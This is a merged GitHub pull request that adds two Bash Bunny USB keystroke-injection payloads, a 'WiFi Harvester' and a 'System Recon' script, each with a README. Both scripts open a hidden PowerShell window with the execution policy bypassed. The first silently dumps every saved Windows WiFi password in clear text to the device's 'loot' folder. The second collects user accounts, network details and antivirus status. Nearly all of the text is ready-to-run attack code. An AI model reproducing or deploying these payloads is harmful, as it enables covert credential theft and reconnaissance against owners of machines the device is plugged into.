Merge pull request #705 from bad-antics/add-nullsec-payloads

Add NullSec Payloads - WiFi Harvester & System Recon
This commit is contained in:
Peaks
2026-02-02 03:14:16 -05:00
committed by GitHub
4 changed files with 218 additions and 0 deletions

View File

@@ -0,0 +1,57 @@
#!/bin/bash
#
# Title: NullSec WiFi Harvester
# Description: Extracts all saved WiFi passwords from Windows and saves to loot
# Author: bad-antics
# Version: 1.0
# Category: Credentials
# Target: Windows 10/11
# Attackmodes: HID, STORAGE
# Options
LOOTDIR=/root/udisk/loot/NullSec-WiFi-Harvester
######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
######## MAKE LOOT DIRECTORY ########
mkdir -p $LOOTDIR
######## ATTACK ########
LED ATTACK
# Open hidden PowerShell and run WiFi extraction
RUN WIN "powershell -w hidden -ep bypass"
QUACK DELAY 1500
# Create extraction script
QUACK STRING "\$loot = (gwmi win32_volume -f 'label=''BashBunny''').Name + 'loot\\NullSec-WiFi-Harvester\\';"
QUACK ENTER
QUACK DELAY 200
QUACK STRING "\$hostname = \$env:COMPUTERNAME;"
QUACK ENTER
QUACK DELAY 200
QUACK STRING "\$profiles = (netsh wlan show profiles) | Select-String '\\:(.+)\$' | ForEach-Object { \$_.Matches.Groups[1].Value.Trim() };"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "\$output = foreach (\$p in \$profiles) { \$pass = (netsh wlan show profile name=\"\$p\" key=clear | Select-String 'Key Content.*:(.*)').Matches.Groups[1].Value; if(\$pass){\"[\$hostname] \$p : \$pass\"} };"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\$output | Out-File -Encoding utf8 (\$loot + \$hostname + '_wifi.txt');"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "exit"
QUACK ENTER
# Wait for file write
sleep 5
######## FINISH ########
LED FINISH

View File

@@ -0,0 +1,39 @@
# NullSec WiFi Harvester 📡
Extracts all saved WiFi passwords from Windows and saves to Bash Bunny loot folder.
## Description
This payload silently extracts all saved WiFi network passwords from a Windows machine using the built-in `netsh` command, then saves them to the Bash Bunny's loot directory with the target hostname.
## Requirements
- Windows 10/11
- Target must have saved WiFi networks
## Status LEDs
| LED | Status |
|-----|--------|
| SETUP | Initializing attack modes |
| ATTACK | Running WiFi extraction |
| FINISH | Complete, safe to unplug |
## Output
Loot saved to: `/root/udisk/loot/NullSec-WiFi-Harvester/<HOSTNAME>_wifi.txt`
Format:
```
[HOSTNAME] NetworkName : Password
[HOSTNAME] AnotherNetwork : AnotherPassword
```
## Execution Time
~8-10 seconds depending on number of saved networks
## Author
- **GitHub**: [bad-antics](https://github.com/bad-antics)
- **More payloads**: [nullsec-flipper-suite](https://github.com/bad-antics/nullsec-flipper-suite)

View File

@@ -0,0 +1,85 @@
#!/bin/bash
#
# Title: NullSec System Recon
# Description: Comprehensive Windows system reconnaissance saved to loot
# Author: bad-antics
# Version: 1.0
# Category: Recon
# Target: Windows 10/11
# Attackmodes: HID, STORAGE
# Options
LOOTDIR=/root/udisk/loot/NullSec-System-Recon
######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
######## MAKE LOOT DIRECTORY ########
mkdir -p $LOOTDIR
######## ATTACK ########
LED ATTACK
# Open hidden PowerShell
RUN WIN "powershell -w hidden -ep bypass"
QUACK DELAY 1500
# Set loot path variable
QUACK STRING "\$loot = (gwmi win32_volume -f 'label=''BashBunny''').Name + 'loot\\NullSec-System-Recon\\';"
QUACK ENTER
QUACK DELAY 200
QUACK STRING "\$hostname = \$env:COMPUTERNAME;"
QUACK ENTER
QUACK DELAY 200
# Collect system info
QUACK STRING "\$report = @();"
QUACK ENTER
QUACK DELAY 100
QUACK STRING "\$report += '=== SYSTEM INFO ===';"
QUACK ENTER
QUACK STRING "\$report += (systeminfo | Select-String 'OS Name|OS Version|System Type|Total Physical Memory');"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$report += \"`n=== USER INFO ===\";"
QUACK ENTER
QUACK STRING "\$report += \"User: \$env:USERNAME | Domain: \$env:USERDOMAIN | Computer: \$hostname\";"
QUACK ENTER
QUACK DELAY 200
QUACK STRING "\$report += \"`n=== LOCAL USERS ===\";"
QUACK ENTER
QUACK STRING "\$report += (Get-LocalUser | Select-Object Name, Enabled | Format-Table | Out-String);"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "\$report += \"`n=== NETWORK ===\";"
QUACK ENTER
QUACK STRING "\$report += (ipconfig /all | Select-String 'IPv4|Default Gateway|DNS Servers|Physical Address');"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$report += \"`n=== AV STATUS ===\";"
QUACK ENTER
QUACK STRING "\$report += (Get-MpComputerStatus | Select-Object AntivirusEnabled, RealTimeProtectionEnabled | Format-List | Out-String);"
QUACK ENTER
QUACK DELAY 500
# Save to loot
QUACK STRING "\$report | Out-File -Encoding utf8 (\$loot + \$hostname + '_recon.txt');"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "exit"
QUACK ENTER
# Wait for completion
sleep 5
######## FINISH ########
LED FINISH

View File

@@ -0,0 +1,37 @@
# NullSec System Recon 🔍
Comprehensive Windows system reconnaissance saved to Bash Bunny loot.
## Description
Silently gathers detailed system information and saves to the Bash Bunny's loot folder:
- OS version and system specs
- Current user and domain info
- Local user accounts
- Network configuration (IP, gateway, DNS, MAC)
- Windows Defender/AV status
## Requirements
- Windows 10/11
- PowerShell (default on Windows)
## Status LEDs
| LED | Status |
|-----|--------|
| SETUP | Initializing attack modes |
| ATTACK | Running reconnaissance |
| FINISH | Complete, safe to unplug |
## Output
Loot saved to: `/root/udisk/loot/NullSec-System-Recon/<HOSTNAME>_recon.txt`
## Execution Time
~15-20 seconds
## Author
- **GitHub**: [bad-antics](https://github.com/bad-antics)